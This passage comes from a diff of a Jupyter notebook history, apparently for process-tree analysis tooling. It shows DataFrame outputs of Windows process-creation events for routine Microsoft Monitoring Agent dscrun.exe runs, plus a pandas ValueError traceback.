<tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd74</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/107</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x6f8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/120</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1fc0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/127</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.253</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x10bc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/129</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xb48</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/139</td>\n      <td>1004</td>\n    </tr>\n  </tbody>\n</table>\n<p>12 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x15c8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xcd8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x8dc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xbd0  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xe34  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x53c  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xef4  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xd74  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x6f8  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x1fc0  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x10bc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xb48  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \n\n                                                   NewProcessName_par  \\\nproc_key                                                                \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \n\n                                                   TimeGenerated_orig_par  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \nc:\\program files\\microsoft monitoring agent\\age...             1970-01-01   \n\n                                                                                           parent_key  \\\nproc_key                                                                                                \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \nc:\\program files\\microsoft monitoring agent\\age...  c:\\program files\\microsoft monitoring agent\\ag...   \n\n                                                   IsRoot IsLeaf IsBranch  \\\nproc_key                                                                    \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \nc:\\program files\\microsoft monitoring agent\\age...  False  False     True   \n\n                                                        path parent_index  \nproc_key                                                                   \nc:\\program files\\microsoft monitoring agent\\age...    1004/5         1004  \nc:\\program files\\microsoft monitoring agent\\age...    1004/8         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/10         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/15         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/67         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/76         1004  \nc:\\program files\\microsoft monitoring agent\\age...   1004/78         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/107         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/120         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/127         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/129         1004  \nc:\\program files\\microsoft monitoring agent\\age...  1004/139         1004  \n\n[12 rows x 35 columns]"
+       },
+       "execution_count": 49,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "ptutil.get_siblings(p_tree, children.iloc[0])"
+    },
+    "executionTime": "2019-12-13T21:02:09.459Z"
+   },
+   {
+    "cell": {
+     "executionCount": 50,
+     "executionEventId": "efe7205d-f552-4d8a-9298-e326b077cd67",
+     "hasError": true,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "ename": "ValueError",
+       "evalue": "Can only compare identically-labeled DataFrame objects",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
+        "\u001b[1;31mValueError\u001b[0m                                Traceback (most recent call last)",
+        "\u001b[1;32m<ipython-input-50-f666af39b496>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_siblings\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mchildren\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mchildren\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m",
+        "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\lib\\site-packages\\pandas\\core\\ops\\__init__.py\u001b[0m in \u001b[0;36mf\u001b[1;34m(self, other)\u001b[0m\n\u001b[0;32m   1565\u001b[0m             \u001b[1;32mif\u001b[0m \u001b[1;32mnot\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_indexed_same\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mother\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1566\u001b[0m                 raise ValueError(\n\u001b[1;32m-> 1567\u001b[1;33m                     \u001b[1;34m\"Can only compare identically-labeled \"\u001b[0m \u001b[1;34m\"DataFrame objects\"\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1568\u001b[0m                 )\n\u001b[0;32m   1569\u001b[0m             \u001b[1;32mreturn\u001b[0m \u001b[0mdispatch_to_series\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mother\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mstr_rep\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
+        "\u001b[1;31mValueError\u001b[0m: Can only compare identically-labeled DataFrame objects"
+       ]
+      }
+     ],
+     "persistentId": "2cb7192e-4b90-4e32-a0f6-5017896f5d7c",
+     "text": "ptutil.get_siblings(p_tree, children.iloc[0]) == children"
+    },
+    "executionTime": "2019-12-13T21:02:15.764Z"
+   },
+   {
+    "cell": {
+     "executionCount": 51,
+     "executionEventId": "dbacdfbc-e891-4c13-b6b5-5e3033f5ae74",
+     "hasError": false,
+     "id": "8b106c58-d787-4dee-8e64-c1e9a1b7f1e7",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x15c8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/5</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xcd8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/8</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x8dc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/10</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbd0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/15</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xe34</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/67</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      